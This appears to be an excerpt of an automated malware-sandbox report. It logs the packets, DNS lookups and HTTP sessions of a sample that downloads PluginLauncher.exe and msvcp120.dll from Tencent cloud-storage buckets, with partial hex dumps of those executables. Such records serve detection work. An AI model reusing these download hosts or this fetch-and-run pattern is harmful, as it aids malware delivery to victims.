                                                                            Jul 25, 2024 16:04:38.995151043 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:38.995285034 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:38.998074055 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:38.998104095 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:38.998164892 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:38.998176098 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:38.998213053 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:38.998213053 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.001485109 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.001517057 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.001560926 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.001569033 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.001597881 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.001626015 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.005131960 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.005177021 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.005213022 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.005217075 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.005247116 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.005279064 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.011542082 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.011586905 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.011619091 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.011625051 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.011655092 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.011678934 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.011686087 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.011749029 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.017281055 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.017364979 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.017383099 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.017469883 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.018486023 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.018547058 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.018563032 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.018596888 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.021898985 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.021923065 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.021970987 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.021979094 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.022011995 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.022073984 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.022737980 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.022820950 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.022847891 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.022877932 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.031115055 CEST49735443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:39.031137943 CEST4434973543.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:39.512624979 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:39.512675047 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:39.512744904 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:39.513040066 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:39.513051987 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:40.949502945 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:40.949611902 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:40.950259924 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:40.950308084 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:40.960166931 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:40.960190058 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:40.961103916 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:40.961165905 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:40.961507082 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:41.004498959 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:41.504566908 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:41.504590034 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:41.504832983 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:41.504874945 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:41.504925013 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:41.505403042 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:41.505456924 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:41.505465031 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:41.505500078 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:41.505503893 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:41.505539894 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:41.506551981 CEST49736443192.168.2.443.152.64.207
                                                                            Jul 25, 2024 16:04:41.506571054 CEST4434973643.152.64.207192.168.2.4
                                                                            Jul 25, 2024 16:04:44.850975037 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:44.851023912 CEST44349739159.75.57.36192.168.2.4
                                                                            Jul 25, 2024 16:04:44.851080894 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:44.851454020 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:44.851466894 CEST44349739159.75.57.36192.168.2.4
                                                                            Jul 25, 2024 16:04:46.270983934 CEST44349739159.75.57.36192.168.2.4
                                                                            Jul 25, 2024 16:04:46.271059990 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:46.272027969 CEST44349739159.75.57.36192.168.2.4
                                                                            Jul 25, 2024 16:04:46.272113085 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:46.286195993 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:46.286211014 CEST44349739159.75.57.36192.168.2.4
                                                                            Jul 25, 2024 16:04:46.286526918 CEST44349739159.75.57.36192.168.2.4
                                                                            Jul 25, 2024 16:04:46.286576033 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:46.287008047 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:46.328541994 CEST44349739159.75.57.36192.168.2.4
                                                                            Jul 25, 2024 16:04:46.691382885 CEST44349739159.75.57.36192.168.2.4
                                                                            Jul 25, 2024 16:04:46.691638947 CEST44349739159.75.57.36192.168.2.4
                                                                            Jul 25, 2024 16:04:46.691704035 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:46.694283009 CEST49739443192.168.2.4159.75.57.36
                                                                            Jul 25, 2024 16:04:46.694293022 CEST44349739159.75.57.36192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 25, 2024 16:04:25.335129976 CEST5279153192.168.2.41.1.1.1
                                                                            Jul 25, 2024 16:04:25.655528069 CEST53527911.1.1.1192.168.2.4
                                                                            Jul 25, 2024 16:04:39.178519011 CEST6310653192.168.2.41.1.1.1
                                                                            Jul 25, 2024 16:04:39.511538982 CEST53631061.1.1.1192.168.2.4
                                                                            Jul 25, 2024 16:04:44.533849001 CEST5343453192.168.2.41.1.1.1
                                                                            Jul 25, 2024 16:04:44.849740028 CEST53534341.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jul 25, 2024 16:04:25.335129976 CEST192.168.2.41.1.1.10x5aa6Standard query (0)wwwdll-1323570959.cos.ap-singapore.myqcloud.comA (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:39.178519011 CEST192.168.2.41.1.1.10x8859Standard query (0)www80-1323570959.cos.ap-singapore.myqcloud.comA (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:44.533849001 CEST192.168.2.41.1.1.10x33b7Standard query (0)wwwqd-1323571107.cos.ap-guangzhou.myqcloud.comA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jul 25, 2024 16:04:25.655528069 CEST1.1.1.1192.168.2.40x5aa6No error (0)wwwdll-1323570959.cos.ap-singapore.myqcloud.comsgp.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:25.655528069 CEST1.1.1.1192.168.2.40x5aa6No error (0)sgp.file.myqcloud.com43.153.232.151A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:25.655528069 CEST1.1.1.1192.168.2.40x5aa6No error (0)sgp.file.myqcloud.com43.153.232.152A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:25.655528069 CEST1.1.1.1192.168.2.40x5aa6No error (0)sgp.file.myqcloud.com43.152.64.193A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:25.655528069 CEST1.1.1.1192.168.2.40x5aa6No error (0)sgp.file.myqcloud.com43.152.64.207A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:39.511538982 CEST1.1.1.1192.168.2.40x8859No error (0)www80-1323570959.cos.ap-singapore.myqcloud.comsgp.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:39.511538982 CEST1.1.1.1192.168.2.40x8859No error (0)sgp.file.myqcloud.com43.152.64.207A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:39.511538982 CEST1.1.1.1192.168.2.40x8859No error (0)sgp.file.myqcloud.com43.153.232.151A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:39.511538982 CEST1.1.1.1192.168.2.40x8859No error (0)sgp.file.myqcloud.com43.153.232.152A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:39.511538982 CEST1.1.1.1192.168.2.40x8859No error (0)sgp.file.myqcloud.com43.152.64.193A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:44.849740028 CEST1.1.1.1192.168.2.40x33b7No error (0)wwwqd-1323571107.cos.ap-guangzhou.myqcloud.comgz.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:44.849740028 CEST1.1.1.1192.168.2.40x33b7No error (0)gz.file.myqcloud.com159.75.57.36A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:44.849740028 CEST1.1.1.1192.168.2.40x33b7No error (0)gz.file.myqcloud.com159.75.57.35A (IP address)IN (0x0001)false
                                                                            Jul 25, 2024 16:04:44.849740028 CEST1.1.1.1192.168.2.40x33b7No error (0)gz.file.myqcloud.com159.75.57.69A (IP address)IN (0x0001)false
                                                                            • wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                            • www80-1323570959.cos.ap-singapore.myqcloud.com
                                                                            • wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44973143.153.232.1514437328C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-25 14:04:27 UTC141OUTGET /PluginLauncher.exe HTTP/1.1
                                                                            User-Agent: Mozilla/5.0
                                                                            Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                            Cache-Control: no-cache
                                                                            2024-07-25 14:04:27 UTC472INHTTP/1.1 200 OK
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 22920
                                                                            Connection: close
                                                                            Accept-Ranges: bytes
                                                                            Content-Disposition: attachment
                                                                            Date: Thu, 25 Jul 2024 14:04:27 GMT
                                                                            ETag: "94079169014abce2f6d26677897d3ca1"
                                                                            Last-Modified: Wed, 20 Mar 2024 10:03:08 GMT
                                                                            Server: tencent-cos
                                                                            x-cos-force-download: true
                                                                            x-cos-hash-crc64ecma: 16004355190225650912
                                                                            x-cos-request-id: NjZhMjViNmJfZmUxNTc5MWVfMTMyZmJfNjRjODIz
                                                                            x-cos-server-side-encryption: AES256
                                                                            2024-07-25 14:04:27 UTC7732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6e 7c 2e 51 2a 1d 40 02 2a 1d 40 02 2a 1d 40 02 23 65 d3 02 20 1d 40 02 11 43 41 03 28 1d 40 02 11 43 43 03 2b 1d 40 02 11 43 45 03 38 1d 40 02 11 43 44 03 27 1d 40 02 f7 e2 8b 02 28 1d 40 02 b8 43 41 03 29 1d 40 02 2a 1d 41 02 06 1d 40 02 b8 43 49 03 2b 1d 40 02 b8 43 bf 02 2b 1d 40 02 b8 43 42 03 2b 1d 40 02 52 69 63 68 2a 1d 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$n|.Q*@*@*@#e @CA(@CC+@CE8@CD'@(@CA)@*A@CI+@C+@CB+@Rich*@
                                                                            2024-07-25 14:04:27 UTC8184INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            2024-07-25 14:04:27 UTC7004INData Raw: 74 70 73 3a 2f 2f 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 43 50 53 30 08 06 06 67 81 0c 01 04 01 30 81 84 06 08 2b 06 01 05 05 07 01 01 04 78 30 76 30 24 06 08 2b 06 01 05 05 07 30 01 86 18 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 30 4e 06 08 2b 06 01 05 05 07 30 02 86 42 68 74 74 70 3a 2f 2f 63 61 63 65 72 74 73 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 44 69 67 69 43 65 72 74 53 48 41 32 41 73 73 75 72 65 64 49 44 43 6f 64 65 53 69 67 6e 69 6e 67 43 41 2e 63 72 74 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 2e 3d 88 f1 25 fb 8b 0d d2 fa 8e 65 ae 8c ad 59 7a 10 71 c4 ca f5 3b 2a 5a e5 5d 3e 99 d1 16 5c 3c 09 ce b0 27 4a cc 22 3a fb 69 bf 31 c3 8e 27 22 9d
                                                                            Data Ascii: tps://www.digicert.com/CPS0g0+x0v0$+0http://ocsp.digicert.com0N+0Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0U00*H.=%eYzq;*Z]>\<'J":i1'"


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.44973243.153.232.1514437328C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-25 14:04:30 UTC135OUTGET /msvcp120.dll HTTP/1.1
                                                                            User-Agent: Mozilla/5.0
                                                                            Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                            Cache-Control: no-cache
                                                                            2024-07-25 14:04:30 UTC472INHTTP/1.1 200 OK
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 455328
                                                                            Connection: close
                                                                            Accept-Ranges: bytes
                                                                            Content-Disposition: attachment
                                                                            Date: Thu, 25 Jul 2024 14:04:30 GMT
                                                                            ETag: "fd5cabbe52272bd76007b68186ebaf00"
                                                                            Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT
                                                                            Server: tencent-cos
                                                                            x-cos-force-download: true
                                                                            x-cos-hash-crc64ecma: 9055190654433826812
                                                                            x-cos-request-id: NjZhMjViNmVfMWFlYzE1MGJfMThhOTdfNjdkNzA5
                                                                            x-cos-server-side-encryption: AES256
                                                                            2024-07-25 14:04:30 UTC7732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f ad d2 1d 2b cc bc 4e 2b cc bc 4e 2b cc bc 4e f6 33 77 4e 29 cc bc 4e 2b cc bd 4e f0 cc bc 4e 6d 9d 61 4e 28 cc bc 4e 6d 9d 63 4e 23 cc bc 4e 6d 9d 5d 4e 18 cc bc 4e 6d 9d 5c 4e 65 cc bc 4e 6d 9d 59 4e 2d cc bc 4e 6d 9d 60 4e 2a cc bc 4e 6d 9d 67 4e 2a cc bc 4e 6d 9d 62 4e 2a cc bc 4e 52 69 63 68 2b cc bc 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$o+N+N+N3wN)N+NNmaN(NmcN#Nm]NNm\NeNmYN-Nm`N*NmgN*NmbN*NRich+N
                                                                            2024-07-25 14:04:30 UTC16368INData Raw: 73 20 64 65 76 69 63 65 20 6c 69 6e 6b 00 00 00 6f 70 65 72 61 74 69 6f 6e 20 63 61 6e 63 65 6c 65 64 00 00 74 6f 6f 20 6d 61 6e 79 20 66 69 6c 65 73 20 6f 70 65 6e 00 70 65 72 6d 69 73 73 69 6f 6e 5f 64 65 6e 69 65 64 00 00 00 61 64 64 72 65 73 73 5f 69 6e 5f 75 73 65 00 00 61 64 64 72 65 73 73 5f 6e 6f 74 5f 61 76 61 69 6c 61 62 6c 65 00 00 00 61 64 64 72 65 73 73 5f 66 61 6d 69 6c 79 5f 6e 6f 74 5f 73 75 70 70 6f 72 74 65 64 00 00 00 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 61 6c 72 65 61 64 79 5f 69 6e 5f 70 72 6f 67 72 65 73 73 00 00 62 61 64 5f 66 69 6c 65 5f 64 65 73 63 72 69 70 74 6f 72 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 61 62 6f 72 74 65 64 00 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 72 65 66 75 73 65 64 00 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 72 65 73 65
                                                                            Data Ascii: s device linkoperation canceledtoo many files openpermission_deniedaddress_in_useaddress_not_availableaddress_family_not_supportedconnection_already_in_progressbad_file_descriptorconnection_abortedconnection_refusedconnection_rese
                                                                            2024-07-25 14:04:30 UTC8184INData Raw: 00 00 00 00 00 00 00 00 01 00 00 00 94 6f 00 10 d0 50 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 69 00 10 b8 4d 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 20 6c 00 10 00 00 00 00 e0 00 00 00 00 00 00 00 78 4c 06 10 dc 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 51 06 10 9c 6e 00 10 70 71 00 10 d8 64 00 10 a0 75 00 10 00 00 00 00 78 5a 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6c 00 10 58 49 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 70 00 10 00 00 00 00 01 00 00 00 04 00 00 00 ac 71 00 10 30 48 06 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 00 6a 00 10 88 41 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 40 68 00
                                                                            Data Ascii: oP@iM@ lxLjQnpqduxZ@lXI@pq0H@jA@@h
                                                                            2024-07-25 14:04:30 UTC8184INData Raw: 00 ff 15 0c 92 06 10 83 c4 14 89 5d f0 85 f6 74 06 8d 9f f0 00 00 00 8d 55 f0 8b cb e8 c5 46 00 00 8b c7 e8 fc 28 03 00 c2 04 00 6a 04 b8 7d be 03 10 e8 1f 29 03 00 8b f1 89 75 f0 c7 06 9c 3f 00 10 83 65 fc 00 8b c6 99 52 50 6a 03 ff 15 0c 92 06 10 83 4d fc ff 8d 4e 08 83 c4 0c e8 5a 09 00 00 e8 bd 28 03 00 c3 8d 41 08 c3 51 6a 00 83 c1 08 83 ca ff e8 f4 40 00 00 59 59 c3 55 8b ec 83 e4 f8 51 53 56 8b f1 83 ca ff 57 33 ff 57 8d 5e 08 8b cb e8 d5 40 00 00 59 85 c0 74 04 32 c0 eb 71 33 c0 8d 8e 60 01 00 00 33 d2 40 f0 0f b1 11 85 c0 74 e9 8b c6 99 52 50 6a 04 ff 15 0c 92 06 10 83 c4 0c c7 44 24 0c 01 00 00 00 85 db 74 06 8d be f0 00 00 00 8d 54 24 0c 8b cf e8 04 46 00 00 8b 8e 6c 01 00 00 56 68 40 91 00 10 85 c9 74 06 8b 01 ff 10 eb 19 8b 8e 68 01 00 00 85
                                                                            Data Ascii: ]tUF(j})u?eRPjMNZ(AQj@YYUQSVW3W^@Yt2q3`3@tRPjD$tT$FlVh@th
                                                                            2024-07-25 14:04:30 UTC8184INData Raw: a8 e8 73 0b 00 00 8b c6 e8 33 09 03 00 c2 04 00 6a 04 b8 f4 c3 03 10 e8 42 09 03 00 8b f1 89 75 f0 c7 06 dc 42 00 10 c7 45 fc 01 00 00 00 8d 4e 60 8b 01 c6 46 58 01 ff 50 08 8b 06 8b ce ff 50 18 8d 8e f8 00 00 00 e8 cd f8 ff ff 83 4d fc ff 8b ce e8 9b 00 00 00 e8 d0 08 03 00 c3 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0a 8d 4f 60 8b 01 52 ff 10 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0b 8d 4f 60 8b 01 52 ff 50 04 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 89 08 01 00 00 85 c9 74 1b 8b 11 56 8b 75 08 8d 46 08 50 ff 52 08 8b 06 8b ce 6a 01 ff 50 04 5e 5d c2 04 00 e8 84 8e 00 00 cc 6a 04 b8 2d c4 03 10 e8 60 08 03 00 8b
                                                                            Data Ascii: s3jBuBEN`FXPPMUEVW3MWpRtO`Rj^_^]UEVW3MWpRtO`RPj^_^]UtVuFPRjP^]j-`
                                                                            2024-07-25 14:04:30 UTC8184INData Raw: 89 7e 58 e8 9c e9 ff ff 89 7e 5c 83 4d fc ff 8b 4d e8 85 c9 74 14 8b 11 8d 45 d8 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 89 7d e8 85 f6 74 06 8d be e0 00 00 00 89 be 30 01 00 00 e8 09 e9 02 00 c2 08 00 55 8b ec 56 8b f1 e8 c0 00 00 00 f6 45 08 01 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 78 43 00 10 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 d4 3f 00 10 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 e8 15 00 00 00 f6 45 08 01 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 6a 04 b8 80 c8 03 10 e8 96 e8 02 00 8b f1 89 75 f0 c7 06 38 42 00 10 83 65 fc 00 eb 0d 6a 00 8b ce e8 87 4a 00 00 84 c0 74 0b 8b ce e8 d8 4a 00 00 84 c0 74 e8 8b ce e8 f0 4a 00
                                                                            Data Ascii: ~X~\MMtE;PR}t0UVEtV,Y^]UEVxCtV,Y^]UEV?tV,Y^]UVEtV,Y^]ju8BejJtJtJ
                                                                            2024-07-25 14:04:30 UTC8184INData Raw: 4b f0 01 00 59 6a 0b 59 8b f0 8d 7b 08 f3 a5 8d 4d 90 e8 da f5 ff ff 8b c3 e8 1e c9 02 00 c2 04 00 55 8b ec 8b 45 0c 83 ec 2c 53 8b d9 56 57 89 43 04 8d 45 d4 50 c7 03 44 15 00 10 e8 0e f0 01 00 59 6a 0b 59 8d 7b 08 8b f0 f3 a5 5f 5e 8b c3 5b 8b e5 5d c2 08 00 6a 38 b8 03 cc 03 10 e8 0b c9 02 00 8b 7d 08 33 f6 8b de 89 5d f0 85 ff 74 44 39 37 75 40 6a 34 ff 15 30 93 06 10 59 89 45 08 89 75 fc 85 c0 74 1e 8b 4d 0c e8 e7 f9 ff ff 50 8d 4d bc e8 3e f4 ff ff 8b 4d 08 43 56 50 e8 7d ff ff ff 8b f0 89 37 f6 c3 01 74 08 8d 4d bc e8 3c f5 ff ff 6a 02 58 e8 7f c8 02 00 c3 6a 00 e8 08 ff ff ff c3 55 8b ec 8b 45 08 89 41 04 8b c1 c7 01 70 15 00 10 5d c2 04 00 83 61 04 00 c7 01 70 15 00 10 c3 55 8b ec 8b 45 0c 8b 49 0c 0f b6 d0 66 8b 45 08 6a 00 66 85 04 51 58 0f 95
                                                                            Data Ascii: KYjY{MUE,SVWCEPDYjY{_^[]j8}3]tD97u@j40YEutMPM>MCVP}7tM<jXjUEAp]apUEIfEjfQX
